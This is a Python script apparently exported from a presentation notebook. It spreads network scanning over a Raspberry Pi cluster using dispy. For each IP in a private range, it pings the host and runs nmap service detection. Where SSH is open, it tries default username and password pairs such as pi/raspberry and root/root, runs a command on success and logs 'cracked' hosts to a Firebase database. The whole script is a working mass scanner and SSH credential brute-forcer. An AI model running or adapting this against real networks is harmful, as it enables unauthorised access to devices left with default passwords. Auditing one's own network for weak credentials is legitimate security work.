#!/usr/bin/env python # coding: utf-8 # # Raspberry Pi Cluster Network Scanning # # Notebook for presentation purposes. # # ## `compute()` # This is the function that is being run on the invidividual nodes. For a more in depth look, please look at `SingleDemo.ipynb`. # In[1]: def compute(hostname): import os if (os.system("ping -c 1 -w 1 " + hostname)) == 0: valid = "alive" from libnmap.process import NmapProcess from libnmap.parser import NmapParser nmproc = NmapProcess(hostname, "-sV") rc = nmproc.run() parsed = NmapParser.parse(nmproc.stdout) host = parsed.hosts[0] services = [] status = "Unknown" cracked = False for serv in host.services: services.append(str(serv.port) + "/" + str(serv.service)) if serv.port == 22: import paramiko client = paramiko.client.SSHClient() client.load_system_host_keys() client.set_missing_host_key_policy(paramiko.WarningPolicy) uid_list=["pi","odroid","root","admin"] pwd_list=["raspberry","odroid","root","admin","password"] for uid in uid_list: for pwd in pwd_list: try: if cracked == False: client.connect(hostname,username=uid,password=pwd) stdin, stdout, stderr = client.exec_command('ls -l') status = "Poor SSH Credentials" print("PWNNEEDDDD!!!!") cracked = True except: print("failed to pwn") status = "Unknown" client.close() import pyrebase config = { "apiKey": "", "authDomain": "clusterscanner.firebaseio.com", "databaseURL": "https://clusterscanner.firebaseio.com/", "storageBucket": "clusterscanner.appspot.com" } firebase = pyrebase.initialize_app(config) auth = firebase.auth() user = auth.sign_in_with_email_and_password("pi@cluster.pi", "") db = firebase.database() # reference to the database service hoststruct = hostname.split(".") data = {"hostname": hostname, "services": services, "status": status} results = db.child(hoststruct[0]).child(hoststruct[1]).child( hoststruct[2]).child(hoststruct[3]).set(data, user['idToken']) else: valid = "dead" return (hostname, valid) # ## Cluster # First we import [dispy](http://dispy.sourceforge.net/), a Python framework for distributed computing. # In[2]: import dispy # ### Setup worker nodes, cluster and monitoring tool # In[3]: workers = ['169.254.102.163', '169.254.116.199', '169.254.114.226', '169.254.156.34'] cluster = dispy.JobCluster(compute, nodes=workers, ip_addr='169.254.148.126') import dispy.httpd, time http_server = dispy.httpd.DispyHTTPServer(cluster) # ### We can now prepare our jobs (range of IP address) # After preparing our job, we give the cluster 2 seconds to make sure everything is initialised properly. Then we check the status of the cluster. # In[4]: jobs = [] test_range = [] for i in range(0, 1): for j in range(150, 200): test_range.append("172.22." + str(i) + "." + str(j)) print("Testing " + str(len(test_range)) + " hostnames") time.sleep(2) cluster.print_status() # ### Showtime! # Let's set the cluster on our jobs. # In[5]: start = time.time() for i, address in enumerate(test_range): job = cluster.submit(address) job.id = i jobs.append(job) for job in jobs: try: hostname, valid = job() # waits for job to finish and returns results print(job.ip_addr + ": " + hostname + " is " + valid + ".") except Exception as e: print(str(job) + " failed: " + str(e)) end = time.time() cluster.print_status() http_server.shutdown() cluster.close() print("") print("Total time taken = " + str(end - start))